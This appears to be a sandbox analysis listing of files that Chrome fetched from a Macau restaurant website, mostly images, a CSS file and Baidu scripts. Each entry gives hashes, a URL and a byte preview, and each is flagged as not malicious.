                                                                                                                                                              SSDEEP:3072:wtFDxHgEtFDxHgxwIpLYKi/BzMia/ujBEFayikgeLU1EZV6Oc5cPWWjcNiZ:+lJgylJgGgKBzM/FTiOnZV6OcKzjcs
                                                                                                                                                              MD5:404B7652C69775AB5884B2690CF4897E
                                                                                                                                                              SHA1:4AC9AF77452210FA98D392930C270C9A83C8559D
                                                                                                                                                              SHA-256:69C12B60B59D52DBCB097590EBA08662EBFA7A07E406842A7E0AA38C63E8B1DD
                                                                                                                                                              SHA-512:504DFADD5297C35C929B6939292BCC309613F6E2FB6B5F2631C54CD9357945515A65B0FE98311BDB20293D400A1BD6CDE066371BC93F8266B96A6864A8F24917
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/uploadfiles/SRL_3_1_3752094.jpg
                                                                                                                                                              Preview:....*GExif..II*...............................................................................................................................(...........1...........2...........i...........8.........Canon.Canon EOS 5D Mark II...$..'....$..'..Adobe Photoshop CS6 (Windows).2020:06:22 10:10:15.............................."...........'.......d...........0221....................................................................................................................30..........30..........30..................................N.......................................................................................1...........2...........4.......$.......................2013:11:08 13:06:34.2013:11:08 13:06:34.................................d.........U......!9.....930611067.d.......d.......................EF100mm f/2.8 Macro.......................................(................................&......H.......H............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IE
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 281
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):227
                                                                                                                                                              Entropy (8bit):6.906578938670738
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:Xt03v2ICuX1L67CahcteStj5C2bTsyS1X3fyCnK:XOfvCClaOFj8/XvyCK
                                                                                                                                                              MD5:E548B6CE15BB616C2BFBA36E9CFBF307
                                                                                                                                                              SHA1:A348285D9928A6548A57569F1FB9D62BDD747F33
                                                                                                                                                              SHA-256:7BE3E4C53CC47CE5CFA40A5E79B42848A90ACEE0D7FF71F10AC31A49C81AEAD5
                                                                                                                                                              SHA-512:B239D1F7D0090D64A5A40ED92C2B06255A3B6E5773F7B1265331E32F290C2B81E44BEA20ACF6DECDB9921F02E3E6779BAC448D5B37569627C798CF1781CB18D6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://push.zhanzhang.baidu.com/push.js
                                                                                                                                                              Preview:..........e..j.0.D.%..H.^...aBO..ri..*.mA,...C..{.zY..y.............`.>..{=.z.B...>...S...5\....5.....:W...o...`.J...-.j.......DH.l..0&F|sz..aF..7..{E...k3.j.........._O/a.._.......L....B..<..`:.."Y....=....Q.w....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 62x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1520
                                                                                                                                                              Entropy (8bit):7.537015242837859
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dkiPojlpMlWNLgLcQnwMowinY4dO2K3iR+WXPmDRS9SZiXns9y84dM7q:Ki83MycLvvSpdO5yTXeo9S0Xnw4K7q
                                                                                                                                                              MD5:DE2128897CC09094065BD906AC8763E8
                                                                                                                                                              SHA1:25B1C5F728357752D864810461394706C47963E1
                                                                                                                                                              SHA-256:809F81E827C5BF143E13C2BF01C68433ACEE3D5680A74A9E5E2726E35CDB1478
                                                                                                                                                              SHA-512:C1F40EA0A3E124F3BB43A38A87BD4F4B34C3C6480A86BB3C62BF4FC0022E3E62BFC581CFC92AF916878453741C22BD15F74CA7CC08746AF4B412C21D59A3A97E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu02b.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................>..........................................................................................!1"...2AaqR#S........................!1..AQ..q."2.a......r.$..............?.....f..g.L0....uN.....J.e.m.R..s...E.k.t.La9..1.0...T...)M.R...7.Jo..G.!"..W.5U..;..]}...8.f.r)[(..k^_x..aG-...^.....cl.....E= .H.A>.'.>.[.D.<|2..5.\{.........l..Z..-o5....^i...)C.9.:..i....o.kr...D)..R3!..9....*......O......j..(5..8.Y...>.U!..........H.-.d.lz...dWUP.+.k.b..\0\[.CZ.$..j>E..j.nUs.l....O.m..V..C.Z%$#...6......v+6,...(..1..!..G..{@.|>....}..1f.....(y....)QT.`.#...9......s.o..=.]]........t...87."..\"..8O....YK...,!A.Q^..R......$......\....i.n....v}.G.x.i^..2d.c.z...[G.,..;...5n....c...|.~.'.......c_..%..e"KK.....g.i...Sp..q.n,9.j.B...h....XbGS..H.1..a..... .Rm..\.~_J.+.;tV5c+.n
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=129, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=970], baseline, precision 8, 610x43, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):24133
                                                                                                                                                              Entropy (8bit):7.048501390685723
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:qYNg7+cPiWYNg7/EnFxnKd9tFmpE8PmO0iXH/:qYyvPtYybEbRPV/
                                                                                                                                                              MD5:697AD2348C664C3B61CB6182B370E91A
                                                                                                                                                              SHA1:8262019BAC4D866DB52AC7F34DA1E0943C6FD87D
                                                                                                                                                              SHA-256:55E8FE87EC2ECC6B3719DB7EDA7281D9CBDFD5D31191FA3E5D29C65EE24B04FE
                                                                                                                                                              SHA-512:1DF928514306A5E2D900F9BDEB2C8E7E4C6EE673B3A3BF9C5D0BA0B69126AF0C96BFF65DB7FB780532CFB6FD6A97E40A6F0A0012FDBD5AA6981656B521DCBCE0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/logo_rightPic.jpg
                                                                                                                                                              Preview:......Exif..MM.*.......................................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:06:30 13:25:11.............0221.......................b...........+...............................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):3634
                                                                                                                                                              Entropy (8bit):5.1149406944154885
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:DXEyjWoP/JFWvB0jrebqjOnp29JSAJdsRZ7tZ:DUySoP/J4vB0jrqqj39JzJdsPxZ
                                                                                                                                                              MD5:57244A4566A51F296CF86506E98B4572
                                                                                                                                                              SHA1:E0B6567D98B62CE28BA2CD258BC9110D00809126
                                                                                                                                                              SHA-256:C1AACACC6176A53F254A57AF64468EA8D485357E5E405753011C2DC255519D67
                                                                                                                                                              SHA-512:A19C92E16C34DC2E8370062547F46D42C1272A8D132AE25E1543ACC7B93897450D325B2DB62297F5A926A4083AA9BDD5E76496C8DCFABBEF455249D00E1B0303
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/m/static/css/index_bgpc.css
                                                                                                                                                              Preview:@media screen and (min-width: 1199px){.. /*---------------- ... banner ---------------*/.. .swiper{.. height:90%;.. margin-top:0;.. }.... .swiper-icon{.. top:50%;.. width:42px;.. height:42px;.. font-size:28px;.. line-height:42px;.. }.. .swiper-left{.. left:20px;.. text-indent:-2px;.. }.. .swiper-right{.. right:20px;.. text-indent:2px;.. }.. .swaper-img{.. font-size:24px;.. }.. .swaper-index{.. bottom:70px;.. }.. .uper-img{.. height:30px;.. }.. .... /*----------------new product---------------*/.. .new-products h3 {.. .font-size: 24px;.. .line-height: 24px;.. }.. .new-products p {.. .font-size: 16px;.. .line-height: 24px;.. }.. /*..*/.. .product-left .product-left-con {.. .width: 90%;.. }.. /*..*/.. .product-right .product-right-con {.. .padding-left: 0.42rem;.. }.. .product-right-con .right-con-img {.. .width: 37%;.. }.. .product-right-con .right-con-txt {.. .padding-left: 0.21rem;.. }.. ../*--------------- ...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=14, height=3744, bps=182, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], baseline, precision 8, 500x334, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):179772
                                                                                                                                                              Entropy (8bit):7.912121017882399
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:wtFDxHgEtFDxHgxwIpLYKi/BzMia/ujBEFayikgeLU1EZV6Oc5cPWWjcNiZ:+lJgylJgGgKBzM/FTiOnZV6OcKzjcs
                                                                                                                                                              MD5:404B7652C69775AB5884B2690CF4897E
                                                                                                                                                              SHA1:4AC9AF77452210FA98D392930C270C9A83C8559D
                                                                                                                                                              SHA-256:69C12B60B59D52DBCB097590EBA08662EBFA7A07E406842A7E0AA38C63E8B1DD
                                                                                                                                                              SHA-512:504DFADD5297C35C929B6939292BCC309613F6E2FB6B5F2631C54CD9357945515A65B0FE98311BDB20293D400A1BD6CDE066371BC93F8266B96A6864A8F24917
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:....*GExif..II*...............................................................................................................................(...........1...........2...........i...........8.........Canon.Canon EOS 5D Mark II...$..'....$..'..Adobe Photoshop CS6 (Windows).2020:06:22 10:10:15.............................."...........'.......d...........0221....................................................................................................................30..........30..........30..................................N.......................................................................................1...........2...........4.......$.......................2013:11:08 13:06:34.2013:11:08 13:06:34.................................d.........U......!9.....930611067.d.......d.......................EF100mm f/2.8 Macro.......................................(................................&......H.......H............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IE
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 90x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1961
                                                                                                                                                              Entropy (8bit):7.670705224455735
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:Ki8U6Zvd5frWUZnI6LccKQBPxzGOtH6DGvW4qoKVLW:+UyTDWmZLfhHFjea
                                                                                                                                                              MD5:B4D0178E44E4245DB87565F22583CB35
                                                                                                                                                              SHA1:ADFE63DDEA3BA209B8D6FC3346003257E538A8CD
                                                                                                                                                              SHA-256:1A3830877E8D875A6700D77A2977A49FE4714667A5BB1C8803C9F0B3C7C1D48F
                                                                                                                                                              SHA-512:920F4AB1059FE218DB412559C05BD819F01F2F41A004A6B5659F47284FCEAA350DD77CC6361915B01D0ED8F5FA92338901551124355A1B75AE10DBE834452E34
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................Z.........................................................................................!"..1A2..Qa........................!1.A..Qa"q.2..B..Rb#.............?.....R.)K../..R.)K..I4I..."!.. .......7+..z.#.Ej..zs#atUfR.L........u..Q..:._.)....R.....c.qsz..s........0G.2.;..8mr.^..]....Xr......W|.Y....!Cn..1.l.W...D.,}...f...y.Z..>|.X3K\J.a..5..Ek.J......5.Xp..=.3. ..~...v's.....;......8<..pY.'..rgW,.8j.L[..(Z.}..._.y..xL....0..n..4.O.g.TL@.=g..,2.b...\\...A.i. .V..x...~ioO...9..G....n_.;..(.F.....Ev..;.L..U.m..fe.......z..9.C#M,Lk.X.+.s:V...<.w.q.............RW.20$.3..Ul...B..l.......]":.rJdP.T.h..*..!*.Tkko9......r.>...K.P>0...7O@6..j...z/_kR#C.G'$=`....S..d..%$7Gi.-..#.P./../..2. ...M....Z.n..H!.......5e6.^....E\.<2k.$..)D.-,S.5.#D.s|.T.1...j.o.........fa$]*
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 95x22, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2247
                                                                                                                                                              Entropy (8bit):7.747917425694003
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:KiCCfzj/hTYpi1krKKlp+SB0w1ObsdGz0WXFc+ZjK07i:pz9Ta86BlQI3d+5XFhZjK0m
                                                                                                                                                              MD5:ACBEB766BF38ABC0DC51EE7D12A2886F
                                                                                                                                                              SHA1:A3246D885EE2D0BAEA7AF02C6921A397601258D7
                                                                                                                                                              SHA-256:2F7625778619177F8E9C94B8BCB90249B15776E66F5DAC7B66306D8E63DC5E01
                                                                                                                                                              SHA-512:8D691326F7CE053D4FC7EE379C3F0DE5C75A4BA74311D28CEEE85E9AC65E492AADC3CBBF6C2462A111C81EE44AB53721C821FEA52B4EC70A4E0A1A1AA0495015
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d..................................................................................................................................................._..........................................................................................!..1".2#AQB3..$.'.......................!.1"..AQ.2a.q....BR#3....$.............?...E.h...Q..4QF.(.E3.c_U......d.....i%......T....I.Qf.....Tx.......>zB@...KKF.(.E.(.v...y......2,.-C.g....Q.....7N...@h.n?..~....`.....r..:..`!.8...Up.\.sjM!._!..1Wb.V.-..[[y..%.R..Fu.J.y8.......v...|[.nCuz....!H3..4..a.. >3.S..*eqX..mu\.....N......3S....e.x.@l..?....{.\.5B.L*...o.<e.....f....j[.j.H...}.*/...l.O.%.dIP.t$.w..zk...e..fV...Tz.s..ef5.0..4KLS.k..yP....M.j.c.M{s.T.".m4............].f.mN.....[(B....... +.h-..+?....x......C...2[DU...........,'.L.S.. 6..h....Dt'...7@n..,.v.....`.u...Zu...+s..&.k5..W.Xem.K....ulHfEt......S%>...[...M*.m...s.)........^ff.4..b..........>_.x..'@....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:gzip compressed data, truncated
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):23
                                                                                                                                                              Entropy (8bit):1.5342190211803406
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:FttTt:XtTt
                                                                                                                                                              MD5:F0D79988B7772C003D04A28BD7417A62
                                                                                                                                                              SHA1:58423A999EEC2997BCFFFB247E9ECD3DFD0ABF44
                                                                                                                                                              SHA-256:30E6FA98FB48C2B132824D1AC5E2243C0BE9E9082FF32598D34D7687CA7F6C7F
                                                                                                                                                              SHA-512:1D497009F3AABD230BCD055EF09FD180E63E330C47F4C1AFDFC36172E5421A220B78E3E3CE30C9AE533C516ACCFA8976FD3F1198BD15FF79373D5FE87FC64CD2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://api.share.baidu.com/s.gif?l=http://www.gourmethousemacau.com/
                                                                                                                                                              Preview:.......................
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 107x22, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2612
                                                                                                                                                              Entropy (8bit):7.775706032907182
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:Ki9V0WqF1JDcfrBCasPJ9kciXewHOx2Ny0ehqNF+/nieOlRuoE:XmH1Kfrkt9Z4HOxKuhq3jGt
                                                                                                                                                              MD5:2A93544096482CF70AC6FA69BAACC692
                                                                                                                                                              SHA1:847498970004E3BF531E663EAF419F9ACB3FDEE4
                                                                                                                                                              SHA-256:3B8EEB293FB192E9B642683791D4E23AC663D399C1DDF6E4AEC896F482BC75FE
                                                                                                                                                              SHA-512:19357FCEEE8BBAAE6E8D97B7444FBFDE02824685C486A9B4861B5624EDC0B7F38004B37DA0AD0625E253149D4B3A71B7BD698B50001DD0B3FA4991970BADE900
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................k........................................................................................!...1"..2b#$AQ.6RS.4d.'.......................!.1"..AQ.aq...2Rb#.....Br3..4.%.............?...E.h...Q..4QJ1>..3aF.....c....N.8.:........7N..)3cvdV.....$H....A...4QF.)9..+.I6S...'.ddIt..q.F..F.....S.&..><+vF.$.$.$......5....jh.E.(.E..>..1.cc...mO.$....l..;.\.i.Ff4>j....E.%.y*...=.o......0...UT....X3..e..na$..*/.9..6..U.....$.\...=(.S.!..w...LAT....}u..w..1...z.l..i,S.b.g...gO^....j...T.C.,......]_)....;...b...|......B...t........M.".82cU....M...0DF..Y.0...|b.....Xg..ch<..W....EF.]}.5E.9.<.|...m...9....G.Vb}.O.....OWa..y.U.c9.S...g............#.".....5....{n.M...L.e...u0..P(..".....RiD...f.......j..l......l.2c....."......k....[...{.K...\F%6.+o....Q,....q...eV..&(.}4..N6]
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=55, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=185], progressive, precision 8, 185x55, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):31599
                                                                                                                                                              Entropy (8bit):7.403665925621602
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:JYy5TP9PqYy5TPlEj3sFeoJfcZhZ31zPV:JZPsZPlEjcFeoJUZhZ31zPV
                                                                                                                                                              MD5:CABEB1EEAB84B34019E8DF267EECD2F9
                                                                                                                                                              SHA1:8F28C558F60698511EC4981542940D93B99FE25D
                                                                                                                                                              SHA-256:95ED7657C958A657CE40904DE3B9A2348519150F3E2FEAF83D855508A5D3FA9C
                                                                                                                                                              SHA-512:F284CF6F8BD4319C0D922920EB50758656D75E64D577193CC37C3017D4C09EA66FEE91E3191AA9C987033214DE9057BD3FE21FCB8E440638365E46040D60B7D9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/icon_Gallery.jpg
                                                                                                                                                              Preview:......Exif..MM.*...........................7...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:06:18 11:38:23.............0221...................................7...............................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 107x22, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2612
                                                                                                                                                              Entropy (8bit):7.775706032907182
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:Ki9V0WqF1JDcfrBCasPJ9kciXewHOx2Ny0ehqNF+/nieOlRuoE:XmH1Kfrkt9Z4HOxKuhq3jGt
                                                                                                                                                              MD5:2A93544096482CF70AC6FA69BAACC692
                                                                                                                                                              SHA1:847498970004E3BF531E663EAF419F9ACB3FDEE4
                                                                                                                                                              SHA-256:3B8EEB293FB192E9B642683791D4E23AC663D399C1DDF6E4AEC896F482BC75FE
                                                                                                                                                              SHA-512:19357FCEEE8BBAAE6E8D97B7444FBFDE02824685C486A9B4861B5624EDC0B7F38004B37DA0AD0625E253149D4B3A71B7BD698B50001DD0B3FA4991970BADE900
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/title_chocology.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................k........................................................................................!...1"..2b#$AQ.6RS.4d.'.......................!.1"..AQ.aq...2Rb#.....Br3..4.%.............?...E.h...Q..4QJ1>..3aF.....c....N.8.:........7N..)3cvdV.....$H....A...4QF.)9..+.I6S...'.ddIt..q.F..F.....S.&..><+vF.$.$.$......5....jh.E.(.E..>..1.cc...mO.$....l..;.\.i.Ff4>j....E.%.y*...=.o......0...UT....X3..e..na$..*/.9..6..U.....$.\...=(.S.!..w...LAT....}u..w..1...z.l..i,S.b.g...gO^....j...T.C.,......]_)....;...b...|......B...t........M.".82cU....M...0DF..Y.0...|b.....Xg..ch<..W....EF.]}.5E.9.<.|...m...9....G.Vb}.O.....OWa..y.U.c9.S...g............#.".....5....{n.M...L.e...u0..P(..".....RiD...f.......j..l......l.2c....."......k....[...{.K...\F%6.+o....Q,....q...eV..&(.}4..N6]
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 28x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):340
                                                                                                                                                              Entropy (8bit):4.3879072613940515
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:3llVuiPjlXJYhg5suRd8jOdmMN1LwgBKio7gG6n:V/XPYhiPRd8jDcQio7gh
                                                                                                                                                              MD5:4466E4CB28131A895ED4DD7440220BCD
                                                                                                                                                              SHA1:B0A0A001A298AE19022C1F014D51F849D35C819D
                                                                                                                                                              SHA-256:3817C6428A088F690F97417F1A45B7F46BE425EE8223DC8AB281083890306140
                                                                                                                                                              SHA-512:5EC689A15359AFA068BBACD02508CB10417E8D4F8CBAA5EEA8375AE77EF68D118596CC9E2C481E852AA91BFB820F44B622725A69F7F7DF44030D4418738DD7C1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu_bg.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................................T.............................................................."...............................?....X...jj)D. Q...P...=*..@h...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 66 x 22
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):979
                                                                                                                                                              Entropy (8bit):7.152303281541647
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:XqWq4WQwtW4mGj20TvusVorrgQw2I+jP1bEvNZLKZ:a32BzofCsifgr2p5
                                                                                                                                                              MD5:0E5462B0B4F00432EAC4B33D5FA31C5A
                                                                                                                                                              SHA1:A7AB83BE74A01E3FAEAD864FCE268F03C4D8CAF2
                                                                                                                                                              SHA-256:CC3C8F67291B46B0B7C26148F146DB5C486D049C5A4996643BCDBFB005917082
                                                                                                                                                              SHA-512:52CAB6BFA1BDC3E106698E9E7A57524D0E25BCAA085C84B3C1D14097950AEA3C82DE0CD6DE48C74AB5100B41414EBD8D2ADB373ABB02CB395791C64D661F125F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:GIF89aB...............YYY..............PPP.........TTTVVV...RRR...QQQXXXUUU...SSS...............WWW...LLLOOOfff.........```{{{............lll...............xxx...KKK...___...........pppccc..........nnn...ooo........eeevvv...mmm|||.............yyyZZZdddMMMsssggg.........NNNiii...zzz............................................................................................................!.......,....B.......\...............]........\'.......\,GB\.\#.......]!@.Q".]..4.U...Z..]...ZZ...M2..EZ..$...>...[...].[....[....../\....[...T6.F.0....]"lY.AK.....d`...Z.0..Q.........d.|.J$..@.....H...U...&.xN..-.*..8...z....P...$.&$.!...-.,....U.]**.ytKRC...H.a..... ..)i.%...Z....-...m!....FQ..0`B...&.E71.K|......H..O.$.c..tM"..neI..Qb.U2.g...1%...qM`pu..Nc9'[.l...I@q+..B..iY@8....pI..:,.`3G..U..q#..7l9Y...D.Q.q=..+/8.....M<.cOV.@m..s.H.xf.. @.E.%d H..N A.'Pr.s..x.29E...:.._.......p ......3\8....l.Q+X.@0."...(.....OT...L...O."...Tu..Kp..+.4.~g..f....;
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 200x27, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):812
                                                                                                                                                              Entropy (8bit):6.797666472245922
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:V/XPYhiPRd89a6V05WYDZWCbwc3aa4socuI9qmvf53PXPkmvf53PXPC:dkiPoEiRC8c3J4soFcdHpvHpC
                                                                                                                                                              MD5:DC76C7C1CC2D6B157D899BECB1C8E3E5
                                                                                                                                                              SHA1:3E3D06383674B1E1BEA4DC1DA0CC74D0EACBC9A2
                                                                                                                                                              SHA-256:F1AEC88AE12FD4C11D8E6C2E817CB3FE947E7E80965417F4954E56D1BEEC0147
                                                                                                                                                              SHA-512:475C85DABEF543B14E5973320FBB0CAE602AF2831447AFE3ED8863FF1364556A51EEC1B49F9C814AD316F580157E66E99C855E120A08A22332E634594CBC8762
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................................l...................................................................1A...!.Q#......................Q!1A..B.............?..g.....}}.?'utx:m....k............o.v.W]~=y.z~.|....ov.....-..Y.y....T..........F@.F..*..&t,..\UN.:........0..9.....`R.g..D.i...NE.i....>...w.k?7.._......W........:|*....G....v..?l.vW......o.8n....}...|.../. ZD.&..*44.p4.q..p....<....J..I..*B..S.N.q.=e..5.L-.NC.i........,.A/`S.l.A.-D_..8gS.Le.Lb`YR.CJ..J...W...].....T..T...!qU;d.'...Xz.^.4..4.;..N.H..zM......9......B.....le.Lb`YR.CJ..J...W...].....T..T...!qU;d.'...Xz.^.4..4.;..N.H..zM......9......B.....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=129, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=970], baseline, precision 8, 970x129, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):30262
                                                                                                                                                              Entropy (8bit):6.883081573201049
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:oYygPtVYyHE9je9XKnJLgykiklUvaDvIKq:oiVrE9je9XKnJLXkikloYvIKq
                                                                                                                                                              MD5:08B64A973E61C5725183887DFDB598AB
                                                                                                                                                              SHA1:8DCE0882154F6D651624419EAA3BBF0DFBA9FD74
                                                                                                                                                              SHA-256:97E9CAC1251CDA64464E273FD53044A118377E8A66D190E8E0A6917D4BB364E1
                                                                                                                                                              SHA-512:0B6715FA02A46B6966C535C72B02F14106426A8D90E7C16D57D8B49E68B77DD7533C4A475BF137959D6F4F51E64F47267D4AF56BD2EF65DC7BBE6FB2F7F70BE2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/topbanner.jpg
                                                                                                                                                              Preview:......Exif..MM.*.......................................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:06:30 13:23:44.............0221..................................................................n...........v.(.....................~...........!.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2767
                                                                                                                                                              Entropy (8bit):5.944417587054994
                                                                                                                                                              Encrypted:false
